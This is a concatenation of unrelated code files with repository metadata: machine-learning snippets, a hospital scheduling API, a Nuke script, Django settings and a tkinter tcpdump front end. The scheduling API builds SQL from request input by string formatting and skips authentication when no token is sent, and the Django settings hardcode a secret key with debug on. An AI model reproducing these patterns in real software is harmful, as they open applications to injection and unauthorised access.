avg = mean(numbers)
variance = sum([pow(x - avg, 2) for x in numbers]) / float(len(numbers) - 1)
return math.sqrt(variance)
def summarize(dataset):
summaries = [(mean(attribute), stdev(attribute)) for attribute in zip(*dataset)]
del summaries[-1]
return summaries
def summarizeByClass(dataset):
separated = separateByClass(dataset)
summaries = {}
for classValue, instances in separated.iteritems():
summaries[classValue] = summarize(instances)
return summaries
def calculateProbability(x, mean, stdev):
exponent = math.exp(-(math.pow(x - mean, 2) / (2 * math.pow(stdev, 2))))
return (1 / (math.sqrt(2 * math.pi) * stdev)) * exponent
def calculateClassProbabilities(summaries, inputVector):
probabilities = {}
for classValue, classSummaries in summaries.iteritems():
probabilities[classValue] = 1
for i in range(len(classSummaries)):
mean, stdev = classSummaries[i]
x = inputVector[i]
probabilities[classValue] *= calculateProbability(x, mean, stdev)
return probabilities
def predict(summaries, inputVector):
probabilities = calculateClassProbabilities(summaries, inputVector)
bestLabel, bestProb = None, -1
for classValue, probability in probabilities.iteritems():
if bestLabel is None or probability > bestProb:
bestProb = probability
bestLabel = classValue
return bestLabel
def getPredictions(summaries, testSet):
predictions = []
for i in range(len(testSet)):
result = predict(summaries, testSet[i])
predictions.append(result)
return predictions
def getAccuracy(testSet, predictions):
correct = 0
for i in range(len(testSet)):
if testSet[i][-1] == predictions[i]:
correct += 1
return (correct / float(len(testSet))) * 100.0
def main():
# filename = 'pima_indians_data.csv'
# filename = 'old_data.csv'
filename = '../data/dianshang_3121867.csv'
# 0.67
splitRatio = 0.67 # 训练集数据 测试集数据
dataset = loadCsv(filename)
trainingSet, testSet = splitDataset(dataset, splitRatio)
print('Split {0} rows into train={1} and test={2} rows').format(len(dataset), len(trainingSet), len(testSet))
# prepare model
summaries = summarizeByClass(trainingSet)
# summaries = summaries.pop(88.0)
# test model
predictions = getPredictions(summaries, testSet)
accuracy = getAccuracy(testSet, predictions)
print('Accuracy: {0}%').format(accuracy)
# import pickle
# fw = open("classifier.txt", "w")
# pickle.dump(summaries, fw)
# fw.close()
# f = open("classifier.txt")
# summaries = pickle.load(f)
# f.close()
# pass
main() | [
"1925453680@qq.com"
] | 1925453680@qq.com |
c13d1f9ed680f1a733827a0c11d2c1f63413f6e4 | f7eedef4cff9bcb9ad8aec7a872cdbedf1844d5f | /HQMS_Cloud/controller/WXSchedule.py | 593217605863c318932a2637e9f64f8607e1b608 | [] | no_license | 8261956/HQMS | dd6bfc9d3a364d82e771ca50e45a4b97594698e8 | 9b95fd26f9c5fc920436d1545eeb47c0151c08d9 | refs/heads/master | 2021-05-05T22:42:23.058859 | 2018-03-28T03:11:23 | 2018-03-28T03:11:23 | 116,200,468 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,545 | py | # -*- coding: utf-8 -*-
import json
import sys
import traceback
import datetime
import web
from common import DBBase as DB
from common.func import packOutput, checkSession, str2List
from WXQueue import WXQueue
from WXWorker import WXWorker
class WXSchedule(object):
db = DB.hqms_cloud_db()
def __init__(self, hospital_name):
self.hospitalName = hospital_name
def getScheduleByQueue(self, queue_filter):
"""根据队列关键字获取专家队列的排班信息"""
result = {}
current_date = datetime.date.today()
startTime = (current_date - datetime.timedelta(current_date.weekday())).strftime("%Y-%m-%d")
endTime = (current_date + datetime.timedelta(6 - current_date.weekday())).strftime("%Y-%m-%d")
# 获取队列基础信息
queue_info = WXQueue(self.hospitalName).getQueueInfoByFilter(queue_filter)
if not queue_info:
return result
# 获取专家信息
workerID = str2List(queue_info.pop("workerLimit"))[0]
workerInfo = WXWorker(self.hospitalName).getWorkerInfo(workerID)
# 获取队列排班信息
where = "queue=\'%s\' AND workDate BETWEEN \'%s\' AND \'%s\'" % (
queue_filter, startTime, endTime)
schedule_list = self.db.select("schedule", where=where)
schedule = []
for item in schedule_list:
if item["onDuty"] == 1:
tmp = {
"onDuty": item["onDuty"],
"workDate": item["workDate"],
"workTime": item["workTime"],
"weekday": item["weekday"]
}
schedule.append(tmp)
result.update(queue_info)
result.update({"schedule": schedule, "workerInfo": workerInfo})
return result
def getScheduleByWorkerID(self, workerID):
"""根据专家ID获取排班信息"""
queue_filter = WXQueue(self.hospitalName).getQueueFilterByWorkerID(workerID)
result = {"list": []}
for filter in queue_filter:
queue_schedule = self.getScheduleByQueue(filter)
result["list"].append(queue_schedule)
return result
def getScheduleByDepartment(self, department):
"""根据科室名称获取排班信息"""
queue_filter = WXQueue(self.hospitalName).getQueueFilterByDepartment(department)
result = {"list": []}
for filter in queue_filter:
queue_schedule = self.getScheduleByQueue(filter)
result["list"].append(queue_schedule)
return result
class WXScheduleInterface(object):
support_action = {
"getScheduleByWorkerID": "getScheduleByWorkerID",
"getScheduleByDepartment": "getScheduleByDepartment"
}
def POST(self, input_data):
data = json.loads(web.data())
token = data.pop("token", None)
if token:
if not checkSession(token):
return packOutput({}, "401", "Token authority failed")
action = data.pop("action", None)
if action is None:
return packOutput({}, code='400', errorInfo='action required')
if action not in self.support_action:
return packOutput({}, code='400', errorInfo='unsupported action')
try:
result = getattr(self, self.support_action[action])(data)
return packOutput(result)
except Exception as e:
exc_traceback = sys.exc_info()[2]
errorInfo = traceback.format_exc(exc_traceback)
return packOutput({"errorInfo": str(e), "rescode": "500"},
code='500', errorInfo=errorInfo)
def getScheduleByWorkerID(self, data):
hospitalName = data.get("hospitalName", None)
if hospitalName is None:
raise Exception("hospital name required")
workerID = data.get("workerID", None)
if workerID is None:
raise Exception("workerName required")
schedule_info = WXSchedule(hospitalName).getScheduleByWorkerID(workerID)
return schedule_info
def getScheduleByDepartment(self, data):
hospitalName = data.get("hospitalName", None)
if hospitalName is None:
raise Exception("hospital name required")
department = data.get("department", None)
if department is None:
raise Exception("department required")
schedule_info = WXSchedule(hospitalName).getScheduleByDepartment(department)
return schedule_info | [
"qiupengfei@cleartv.cn"
] | qiupengfei@cleartv.cn |
a55dac7f367c56e690c755d0fe804af2e655c9c9 | cffe83637b3965ad27f5a679e187bfaf46afa690 | /.stversions/cookbook/magic_browser/cookbook/nuke/menus/Lumbermill/BuildShot~20210212-114815.py | ae6334ddf7ac7ae3b88f406b07d78e13323f2ac3 | [] | no_license | gmolinart/LC_MASTER | da768a592821fe4dc55bdf693291df3409c3f035 | 2f17eaf5c4c7f70be0c0b5976b479002da4e7d52 | refs/heads/master | 2023-04-29T07:38:24.653457 | 2021-05-17T18:42:34 | 2021-05-17T18:42:34 | 368,287,070 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,629 | py | import nuke
from cgl.core.path import PathObject, lj_list_dir, find_latest_publish_objects
from cgl.core.config import app_config
from cgl.plugins.nuke.cgl_nuke import NukePathObject, import_directory, import_media, set_comp_default_settings , confirm_prompt
import os
def check_file_on_system():
current_shot = PathObject(nuke.root().name())
if current_shot.filename:
return(True)
def get_dependencies():
current_shot = PathObject(nuke.root().name())
all_tasks = current_shot.glob_project_element('task')
publish_objects = []
for task in all_tasks:
task_object = current_shot.copy(filename='',
task=task,
user='publish',
context='render').latest_version()
if os.path.isdir(task_object.copy(filename = '').path_root):
publish_objects.append(task_object)
return(publish_objects)
def import_dependencies():
current_shot = PathObject(nuke.root().name())
publish_objects = get_dependencies()
spread = 0
for task_object in publish_objects:
if task_object.task != current_shot.task:
filename = lj_list_dir(task_object.path_root)[0]
sequence_path = task_object.copy(filename=filename)
print(task_object.path)
readNode = import_media(sequence_path.path_root, name=task_object.task)
readNode.setSelected(True)
color_dic = {'plate': 1278818815.0, 'elem': 1230983935.0, 'cam': 1264526079.0, 'default': 825305599.0}
if task_object.task in color_dic.keys():
tile_color = color_dic[task_object.task]
else:
tile_color = color_dic['default']
n = nuke.nodes.BackdropNode(xpos=readNode.xpos() - 20,
bdwidth=120,
ypos=readNode.ypos() - 80,
bdheight=170,
tile_color=tile_color,
note_font_size=42,
z_order=0,
name='{} BACKDROP'.format(
task_object.task.upper()),
label=task_object.task.upper())
def run():
if check_file_on_system():
import_dependencies()
set_comp_default_settings()
else:
confirm_prompt(title = 'ERROR', message = 'File not in sytem please open file ')
| [
"gmolinart@gmail.com"
] | gmolinart@gmail.com |
54714091e40e4dea6c5b79bad259c023f9dcf308 | b7a2b794541f7d6f76261ca5cfaf58eb05be830b | /codes/2022/oct/scaled_dot_product_attention.py | bf2e60efb1f5f6846256c1e06f8e9fe74be1f010 | [
"MIT"
] | permissive | GaoangLiu/GaoangLiu.github.io | 3853cdd8599f8ab7bc073de376e32762c1a0ded3 | 66cf3d9cd0e074af21ec97ce15a0e9211b23a884 | refs/heads/master | 2023-05-15T03:31:30.950588 | 2023-05-01T02:18:00 | 2023-05-01T02:18:00 | 163,704,502 | 0 | 1 | MIT | 2021-07-14T00:25:03 | 2019-01-01T00:18:31 | Jupyter Notebook | UTF-8 | Python | false | false | 1,618 | py | #!/usr/bin/env python
import codefast as cf
from tensorflow import matmul, math, cast, float32
from tensorflow import keras as K
import numpy as np
# Implementing the Scaled-Dot Product Attention
class DotProductAttention(K.layers.Layer):
def __init__(self, **kwargs):
super(DotProductAttention, self).__init__(**kwargs)
def call(self,
queries: np.array,
keys: np.array,
values: np.array,
d_k: int,
mask=None):
# Scoring the queries against the keys after transposing the latter, and scaling
scores = matmul(queries, keys, transpose_b=True) / math.sqrt(
cast(d_k, float32))
# Apply mask to the attention scores
if mask is not None:
scores += -1e9 * mask
# Computing the weights by a softmax operation
weights = K.backend.softmax(scores)
# Computing the attention by a weighted sum of the value vectors
return matmul(weights, values)
def test():
d_k = 64 # Dimensionality of the linearly projected queries and keys
d_v = 64 # Dimensionality of the linearly projected values
batch_size = 3 # Batch size from the training process
input_seq_length = 5 # Maximum length of the input sequence
queries = np.random.random((batch_size, input_seq_length, d_k))
keys = np.random.random((batch_size, input_seq_length, d_k))
values = np.random.random((batch_size, input_seq_length, d_v))
attention = DotProductAttention()
print(attention(queries, keys, values, d_k))
if __name__ == '__main__':
test()
| [
"ssruoz@gmail.com"
] | ssruoz@gmail.com |
debf8eb20dcdf7314e802ca1575b3fa5315ac73b | 5674a52ee8a3e6abfb02baef223a4e48e8e379bd | /st_app.py | b4d89fa6df1a56bf48d6227bcf2ec03443a61399 | [] | no_license | student1304/cryptoquote | ebd439ddd6fd3e9f2eca1d47b41f6b98031290b0 | b3794701b3a39fcb653cc023d875c875f0eec21b | refs/heads/master | 2023-01-20T03:56:00.922458 | 2020-11-27T17:24:25 | 2020-11-27T17:24:25 | 316,559,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 462 | py | import streamlit as st
from cryptoquote import encrypt
st.title('Cryptoquote by Alex')
st.write('Please enter a quote which you want to turn into a cryptoquote game')
quote = st.text_area('Enter or paste your quote here:')
encrpyted = encrypt(quote)
st.write('Your game begins:')
st.markdown(f'**{encrpyted}**')
st.text('---------------------------------------------------------------')
st.text("To print just use use browser's print function or press CTRL-P") | [
"student1304@online.de"
] | student1304@online.de |
be0f894d955a7f808f25605b1110a6f45b61ddff | a67781ba3d5a093f9d38fa5a823a31600a142ad0 | /LeetCode/DataStructure/BinaryTree/MaxDepth_Rec_BottomUp.py | f3b6760b9306a35e13ef65997074bcc2fb50d7ea | [
"MIT"
] | permissive | hooyao/Coding-Py3 | 0166a67263a5351b3c85540d75c4f155ff3f558d | f462b66ae849f4332a4b150f206dd49c7519e83b | refs/heads/master | 2021-04-15T09:45:35.230859 | 2019-06-22T07:24:22 | 2019-06-22T07:24:22 | 126,565,644 | 0 | 0 | MIT | 2019-12-02T01:44:14 | 2018-03-24T04:29:50 | Python | UTF-8 | Python | false | false | 1,007 | py | import sys
from BTreeUtils import BTreeHelper
from BTreeUtils import TreeNode
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def maxDepth(self, root):
"""
:type root: TreeNode
:rtype: int
"""
if root is None:
return 0
return self.recursive_bottom_up(root)
def recursive_bottom_up(self, root):
if root is None:
return 0
left_depth = self.recursive_bottom_up(root.left)
right_depth = self.recursive_bottom_up(root.right)
return max(left_depth, right_depth) + 1
def main(*args):
tree_array = [3, 9, 20, None, None, 15, 7]
root = BTreeHelper.list_to_tree(tree_array)
BTreeHelper.pretty_print(root)
result = Solution().maxDepth(root)
print(result)
if __name__ == '__main__':
main(*sys.argv[1:])
| [
"hooyao@gmail.com"
] | hooyao@gmail.com |
5d2be0a0fb70fa8c5e5cc20312f86901bd3ba25c | 7c3929a55b39be0dbe12856e61e4ecb31ad20378 | /Algo/less5/task_1.py | cf987d78127e385a119733c3142b67409cc612b1 | [] | no_license | ElenaAn12/GBLearning | 01f3a1d34e86150e2defb31153dbd0611d7eeefe | 40d13fae34dccbf7246a7991c45df0e1abfa62a0 | refs/heads/master | 2022-07-06T21:01:35.598574 | 2020-05-17T09:43:02 | 2020-05-17T09:43:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,599 | py | """
1. Пользователь вводит данные о количестве предприятий, их наименования и прибыль
за 4 квартала (т.е. 4 отдельных числа) для каждого предприятия.
Программа должна определить среднюю прибыль (за год для всех предприятий)
и вывести наименования предприятий, чья прибыль выше среднего и отдельно
вывести наименования предприятий, чья прибыль ниже среднего.
Подсказка:
Для решения задачи обязательно примените какую-нибудь коллекцию из модуля collections
Для лучшее освоения материала можете даже сделать несколько решений этого задания,
применив несколько коллекций из модуля collections
Пример:
Введите количество предприятий для расчета прибыли: 2
Введите название предприятия: Рога
через пробел введите прибыль данного предприятия
за каждый квартал(Всего 4 квартала): 235 345634 55 235
Введите название предприятия: Копыта
через пробел введите прибыль данного предприятия
за каждый квартал(Всего 4 квартала): 345 34 543 34
Средняя годовая прибыль всех предприятий: 173557.5
Предприятия, с прибылью выше среднего значения: Рога
Предприятия, с прибылью ниже среднего значения: Копыта
"""
from collections import Counter
from statistics import mean
while True:
try:
company_count = int(input('Введите количество предприятий: '))
break
except ValueError:
print('Введенное значение не является числом!')
company_rating = Counter()
for i in range(1, company_count + 1):
company_name = input(f'Введите название предприятия № {i}: ')
while True:
try:
quarter_profit = input('Введите прибыль предприятия за каждый квартал через пробел: ').split()
if len(quarter_profit) < 4:
raise ValueError
company_profit = [int(elem) for elem in quarter_profit]
break
except ValueError:
print('Вы подали доход не за все отчетные периоды или предоставлили неверные данные!')
for elem in company_profit:
company_rating[company_name] += elem
company_avg_profit = mean(company_rating.values())
print(f'Средняя годовая прибыль всех предприятий: {company_avg_profit}')
lower_profit, upper_profit = [], []
for key, val in company_rating.items():
lower_profit.append(key) if val < company_avg_profit else upper_profit.append(key)
print(f'Предприятия с прибылью выше среднего значения: {" ".join(upper_profit)}')
print(f'Предприятия с прибылью ниже среднего значения: {" ".join(lower_profit)}')
| [
"cronos1009@yandex.ru"
] | cronos1009@yandex.ru |
6f1f21782fa25c1e0c733ab8bf19c1b0653e4f1a | b76c6813f2ce2fd24a33175a0249cd9544583fe7 | /blog/migrations/0035_auto_20200603_1114.py | 873a1f8a79a322df963468181144adc5403b8b8e | [] | no_license | adrianglez2203/nuevo_as | 0074e6d8155a471bb7d81bc3456914acdc7fba98 | df375410e9d6922ebb931645ff8f1c7b3f5cb93b | refs/heads/master | 2022-08-01T23:43:51.328124 | 2020-06-06T15:35:23 | 2020-06-06T15:35:23 | 270,111,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 534 | py | # Generated by Django 3.0.6 on 2020-06-03 15:14
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('blog', '0034_auto_20200603_1112'),
]
operations = [
migrations.AlterField(
model_name='post',
name='published',
field=models.DateTimeField(default=datetime.datetime(2020, 6, 3, 15, 14, 3, 700736, tzinfo=utc), verbose_name='Fecha de Publicacion'),
),
]
| [
"adrianglez2203@gmail.com"
] | adrianglez2203@gmail.com |
4f599928dcbe084ccabaf12fc95e50b9adde750b | 30ebffdf55185e26577325d8a577db030b57a695 | /mysite/Cars/migrations/0001_initial.py | 0ff669ceb53824b0a51f7115082c7d28968cbea7 | [] | no_license | JabbarMurad/django_jm | 3de1630ee0d4127e0fa54a6f09a15d1b00b36cdd | 0cbfeaad16f59bbc61820ffc981e0de3441f06c6 | refs/heads/master | 2023-02-03T22:55:45.280691 | 2020-12-22T11:06:22 | 2020-12-22T11:06:22 | 323,609,391 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 623 | py | # Generated by Django 3.1.4 on 2020-12-21 09:36
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Specs',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20)),
('price', models.DecimalField(decimal_places=2, max_digits=8)),
('weight', models.PositiveIntegerField()),
],
),
]
| [
"IDRAK@ws0113.corp.idrak.az"
] | IDRAK@ws0113.corp.idrak.az |
9903b6cb1114f4fd84facf1b3807dca171725ee3 | 8b53eaac440ed565748698f8dc9f69a2d8f68a16 | /projeto/settings.py | d93691129f1d353dfcd38c2bfee5e061f3f6ecc6 | [] | no_license | kelver-web/projeto-django | eb0a9ecd07a1708a52bc377d74f485839773c13b | dba4fde3d2a8fb7a1d315163447c1764adde4bc0 | refs/heads/master | 2023-06-08T21:05:41.178115 | 2021-06-24T21:19:51 | 2021-06-24T21:19:51 | 369,625,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,299 | py | """
Django settings for projeto project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-)s%)591he1_l)2l=ciqgpz)rgyu)ie0-h6ilzp3!6^jiqgypx%'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'projeto.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'projeto.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"kelverwt@gmail.com"
] | kelverwt@gmail.com |
303f90ad9c974b79b7ade8db79e26bb8c6485dd5 | 29b6631380f6d5a0543d0a303b7e610a1594e0c5 | /main.py | 9ae61fcc5e08c90006321053713df4d1603363fc | [] | no_license | citrica/players | aa54c9e02eeb2d26c01b6ff05d105379ad86774a | d3902443b07fc5f51dc9a7136603a628670d3044 | refs/heads/master | 2020-09-15T22:34:13.796563 | 2019-11-23T10:39:04 | 2019-11-23T10:39:04 | 223,571,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,816 | py | class Player():
def __init__(self, first_name, last_name, height_cm, weight_kg):
self.first_name = first_name
self.last_name = last_name
self.height_cm = height_cm
self.weight_kg = weight_kg
def weight_to_lbs(self):
pounds = self.weight_kg * 2.20462262
return pounds
class BasketballPlayer(Player):
def __init__(self, first_name, last_name, height_cm, weight_kg, points, rebounds, assists):
super().__init__(first_name=first_name, last_name=last_name, height_cm=height_cm, weight_kg=weight_kg)
self.points = points
self.rebounds = rebounds
self.assists = assists
class FootballPlayer(Player):
def __init__(self, first_name, last_name, height_cm, weight_kg, goals, yellow_cards, red_cards):
super().__init__(first_name=first_name, last_name=last_name, height_cm=height_cm, weight_kg=weight_kg)
self.goals = goals
self.yellow_cards = yellow_cards
self.red_cards = red_cards
print("Enter a football player's data!! ")
fName = input("Enter a player name: ")
fLastName = input("Enter last name: ")
fHeight = input("Enter height: ")
fWeight = input("Enter weight: ")
goals = input("Enter goals: ")
yellowCards = input("Enter yellow cards: ")
redCards = input("Enter red cards: ")
print("Enter a basketboll player's data!! ")
bName = input("Enter a player name: ")
bLastName = input("Enter last name: ")
bHeight = input("Enter height: ")
bWeight = input("Enter weight: ")
points = input("Enter points: ")
rebounds = input("Enter rebounds: ")
assists = input("Enter assists: ")
new_player_football = FootballPlayer(first_name=fName,
last_name=fLastName,
height_cm=float(fHeight),
weight_kg=float(fWeight),
goals=int(goals),
yellow_cards=int(yellowCards),
red_cards=int(redCards))
new_player_basket = BasketballPlayer(first_name=bName,
last_name=bLastName,
height_cm=float(bHeight),
weight_kg=float(bWeight),
points=int(points),
rebounds=int(rebounds),
assists=int(assists))
with open("football_players.txt", "w") as football_file:
football_file.write(str(new_player_football.__dict__))
with open("basket_players.txt", "w") as basket_file:
basket_file.write(str(new_player_basket.__dict__))
print("Football player's data: " + str(new_player_football.__dict__))
print("Basketball player's data: " + str(new_player_basket.__dict__))
| [
"inma.rueda28@gmail.com"
] | inma.rueda28@gmail.com |
d490050414ca89df702b722da8dc2bdba1855034 | a2b5061255a53e3cf6ff561cd1d8fc5e3d54427c | /tcpdump.py.bak1 | 0f4aedf6337fa0b19035c2f431080ad89735c396 | [] | no_license | G1-10ST/NetworkGuard | 3f07a274236519aceeecc83ac64f2232d8820f25 | b88b058b2e502d23e0c768cd0b5318cbc3703939 | refs/heads/master | 2020-09-12T07:51:47.687043 | 2019-11-21T19:32:24 | 2019-11-21T19:32:24 | 222,360,538 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,275 | bak1 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# GUI module generated by PAGE version 4.26
# in conjunction with Tcl version 8.6
# Nov 18, 2019 06:43:42 AM IST platform: Linux
import sys
import re
import subprocess
try:
import Tkinter as tk
except ImportError:
import tkinter as tk
try:
import ttk
py3 = False
except ImportError:
import tkinter.ttk as ttk
py3 = True
import tcpdump_support
def vp_start_gui():
'''Starting point when module is the main routine.'''
global val, w, root
root = tk.Tk()
top = Toplevel1 (root)
tcpdump_support.init(root, top)
root.mainloop()
w = None
def create_Toplevel1(root, *args, **kwargs):
'''Starting point when module is imported by another program.'''
global w, w_win, rt
rt = root
w = tk.Toplevel (root)
top = Toplevel1 (w)
tcpdump_support.init(w, top, *args, **kwargs)
return (w, top)
def destroy_Toplevel1():
global w
w.destroy()
w = None
class Toplevel1:
def task1(self):
p1 = subprocess.Popen(["tcpdump","-D"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#txt1 = p1.stdout.decode()
while True:
txt1 = p1.stdout.readline()
if not txt1:
break
txt1.rstrip()
self.Scrolledlistbox1.insert(1,txt1)
def back(self):
root.destroy()
subprocess.Popen(['python3','seccond.py'])
def task2(self):
p2 = subprocess.Popen(["tcpdump","-nn","-r","server.pcap"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#txt2 = p2.stdout.decode()
while True:
txt2 = p2.stdout.readline()
if not txt2:
break
txt2.rstrip()
self.Scrolledlistbox2.insert(1,txt2)
def __init__(self, top=None):
'''This class configures and populates the toplevel window.
top is the toplevel containing window.'''
_bgcolor = '#d9d9d9' # X11 color: 'gray85'
_fgcolor = '#000000' # X11 color: 'black'
_compcolor = '#d9d9d9' # X11 color: 'gray85'
_ana1color = '#d9d9d9' # X11 color: 'gray85'
_ana2color = '#ececec' # Closest X11 color: 'gray92'
font9 = "-family {Noto Sans Display} -size 14 -weight normal " \
"-slant roman -underline 0 -overstrike 0"
self.style = ttk.Style()
if sys.platform == "win32":
self.style.theme_use('winnative')
self.style.configure('.',background=_bgcolor)
self.style.configure('.',foreground=_fgcolor)
self.style.map('.',background=
[('selected', _compcolor), ('active',_ana2color)])
top.geometry("825x536+240+132")
top.minsize(1, 1)
top.maxsize(1351, 738)
top.resizable(1, 1)
top.title("TCPDump")
top.configure(background="#020202")
self.Scrolledlistbox1 = ScrolledListBox(top)
self.Scrolledlistbox1.place(relx=0.036, rely=0.243, relheight=0.631
, relwidth=0.407)
self.Scrolledlistbox1.configure(background="white")
#self.Scrolledlistbox1.configure(orient="vertical")
self.Scrolledlistbox1.configure(font="TkFixedFont")
self.Scrolledlistbox1.configure(highlightcolor="#d9d9d9")
self.Scrolledlistbox1.configure(selectbackground="#c4c4c4")
self.Button1 = tk.Button(top)
self.Button1.place(relx=0.061, rely=0.112, height=40, width=300)
self.Button1.configure(background="#000000")
self.Button1.configure(font=font9)
self.Button1.configure(command=self.task1)
self.Button1.configure(foreground="#ffffff")
self.Button1.configure(text='''Display all connected Interfaces''')
self.Scrolledlistbox2 = ScrolledListBox(top)
self.Scrolledlistbox2.place(relx=0.473, rely=0.243, relheight=0.631
, relwidth=0.504)
self.Scrolledlistbox2.configure(background="white")
self.Scrolledlistbox2.configure(font="TkFixedFont")
self.Scrolledlistbox2.configure(highlightcolor="#d9d9d9")
self.Scrolledlistbox2.configure(selectbackground="#c4c4c4")
self.Button2 = tk.Button(top)
self.Button2.place(relx=0.57, rely=0.112, height=40, width=293)
self.Button2.configure(background="#000000")
self.Button2.configure(font=font9)
self.Button2.configure(command=self.task2)
self.Button2.configure(foreground="#ffffff")
self.Button2.configure(text='''Capture 10 Packets from Source''')
# The following code is added to facilitate the Scrolled widgets you specified.
class AutoScroll(object):
'''Configure the scrollbars for a widget.'''
def __init__(self, master):
# Rozen. Added the try-except clauses so that this class
# could be used for scrolled entry widget for which vertical
# scrolling is not supported. 5/7/14.
try:
vsb = ttk.Scrollbar(master, orient='vertical', command=self.yview)
except:
pass
hsb = ttk.Scrollbar(master, orient='horizontal', command=self.xview)
#self.configure(yscrollcommand=_autoscroll(vsb),
# xscrollcommand=_autoscroll(hsb))
try:
self.configure(yscrollcommand=self._autoscroll(vsb))
except:
pass
self.configure(xscrollcommand=self._autoscroll(hsb))
self.grid(column=0, row=0, sticky='nsew')
try:
vsb.grid(column=1, row=0, sticky='ns')
except:
pass
hsb.grid(column=0, row=1, sticky='ew')
master.grid_columnconfigure(0, weight=1)
master.grid_rowconfigure(0, weight=1)
# Copy geometry methods of master (taken from ScrolledText.py)
if py3:
methods = tk.Pack.__dict__.keys() | tk.Grid.__dict__.keys() \
| tk.Place.__dict__.keys()
else:
methods = tk.Pack.__dict__.keys() + tk.Grid.__dict__.keys() \
+ tk.Place.__dict__.keys()
for meth in methods:
if meth[0] != '_' and meth not in ('config', 'configure'):
setattr(self, meth, getattr(master, meth))
@staticmethod
def _autoscroll(sbar):
'''Hide and show scrollbar as needed.'''
def wrapped(first, last):
first, last = float(first), float(last)
if first <= 0 and last >= 1:
sbar.grid_remove()
else:
sbar.grid()
sbar.set(first, last)
return wrapped
def __str__(self):
return str(self.master)
def _create_container(func):
'''Creates a ttk Frame with a given master, and use this new frame to
place the scrollbars and the widget.'''
def wrapped(cls, master, **kw):
container = ttk.Frame(master)
container.bind('<Enter>', lambda e: _bound_to_mousewheel(e, container))
container.bind('<Leave>', lambda e: _unbound_to_mousewheel(e, container))
return func(cls, container, **kw)
return wrapped
class ScrolledListBox(AutoScroll, tk.Listbox):
'''A standard Tkinter Listbox widget with scrollbars that will
automatically show/hide as needed.'''
@_create_container
def __init__(self, master, **kw):
tk.Listbox.__init__(self, master, **kw)
AutoScroll.__init__(self, master)
def size_(self):
sz = tk.Listbox.size(self)
return sz
import platform
def _bound_to_mousewheel(event, widget):
child = widget.winfo_children()[0]
if platform.system() == 'Windows' or platform.system() == 'Darwin':
child.bind_all('<MouseWheel>', lambda e: _on_mousewheel(e, child))
child.bind_all('<Shift-MouseWheel>', lambda e: _on_shiftmouse(e, child))
else:
child.bind_all('<Button-4>', lambda e: _on_mousewheel(e, child))
child.bind_all('<Button-5>', lambda e: _on_mousewheel(e, child))
child.bind_all('<Shift-Button-4>', lambda e: _on_shiftmouse(e, child))
child.bind_all('<Shift-Button-5>', lambda e: _on_shiftmouse(e, child))
def _unbound_to_mousewheel(event, widget):
if platform.system() == 'Windows' or platform.system() == 'Darwin':
widget.unbind_all('<MouseWheel>')
widget.unbind_all('<Shift-MouseWheel>')
else:
